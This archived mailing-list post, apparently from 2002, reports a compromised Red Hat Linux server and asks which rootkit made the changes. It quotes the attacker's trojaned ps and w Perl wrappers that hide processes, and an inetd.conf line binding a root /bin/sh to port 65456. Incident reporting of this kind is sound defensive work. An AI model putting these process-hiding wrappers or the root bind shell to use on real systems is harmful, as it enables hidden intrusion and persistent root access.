Security Incidents mailing list archives

nouser - rootkit ?

From: "Dan Uscatu" <duscatu () phenomedia ro>
Date: Mon, 11 Feb 2002 01:44:31 +0200

 i found today something funny happening when i tried to install a web
 on a customer's machine:
 1. w - returned some weird "/usr/bin/perl" processes
 2. ps - was not showing everything
 3. two connections to some irc servers; fuser - finding the process id's
 them, but ps not showing them

 some infos about the server (unfortunately it wasnt installed by me...):
 [root@www root]# uname -a
 Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown (compiled in
 the future too, lol)
 [root@www /root]# cat /etc/redhat-release
 Red Hat Linux release 7.1 (Seawolf)

 more digging... so i found some modified files:

 [root@www nouser]# ls -l /bin/ps
 -rwxr-xr-x    1 nouser   nouser        188 Mar  2 15:45 /bin/ps

 [root@www /root]# cat /bin/ps
 $xargs =join(' ',@ARGV);
 $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
 grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
 print "$ps";
 [root@www /root]# ls -l /usr/lib/libxnotps
 -r-xr-xr-x    1 root     root        64092 Apr  5  2001 /usr/lib/libxnotps

 [root@www nouser]# ls -l /usr/bin/w
 -rwxr-xr-x    1 nouser   nouser        105 Jan 20 01:03 /usr/bin/w

 [root@www /root]# cat /usr/bin/w
 $xargs =join(' ',@ARGV);
 $w = `/usr/lib/libxyotps $xargs \| grep -v nouser`;
 print "$w";
 [root@www /root]# ls -l /usr/lib/libxyotps
 -r-xr-xr-x    1 root     root         8688 Apr  5  2001 /usr/lib/libxyotps

 there is another file called /usr/lib/libxzotps, but i couldnt find what is
 pointing at that, yet
 no reference found on the web, searching for "libxnotps" or "libxnotps" or

 [root@www nouser]# grep nouser /etc/passwd

 [root@www nouser]# ls -l /sbin/nouser
 total 3328
-rw-r--r--    1 nouser   nouser      80092 Mar  2 23:22 broadcast-5000.log
-rw-r--r--    1 nouser   nouser    3057793 Mar  2 23:22 broadcast-full.log
drwxr-xr-x    2 nouser   nouser       4096 Mar  2 13:01 Desktop
drwxrwxr-x    4 nouser   nouser       4096 Mar  5 19:23 iroffer
-rw-rw-r--    1 nouser   nouser     206865 Mar  5 19:23 iroffer.tar.gz
-rwsr-xr-x    1 root     root        13855 Mar  2 13:04 nouser
-rw-rw-r--    1 root     root         2215 Mar  2 23:23
drwxrwxr-x    3 nouser   nouser       4096 Jan 20 01:15 scan-1
drwxr-xr-x    3 nouser   root         4096 Mar  2 13:04 scan-2
drwxr-xr-x    3 nouser   root         4096 Mar  2 13:04 scan-3
drwxrwxr-x    3 nouser   nouser       4096 Jan 20 01:13 war

 of course the suid "nouser" gives a root shell... and the directories are
full of war scripts, flood tools, and warez... given away through irc bots

i have scanned the machine using chkroot kit... the only funny thing found
was an inetd.conf, containing:

 [root@www nouser]# cat /etc/inetd.conf
65456    stream  tcp     nowait  root  /bin/sh     sh

 of course, inetd is not installed :) that points me to the idea that the
process was somehow automated... but i cant find any reference to a rootkit
that does these changes. seems pretty stupid for a rootkit  anyway... but i
want to be sure no other major changes were made... before i install the
production server there.

thanks for any comments

This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

Current thread: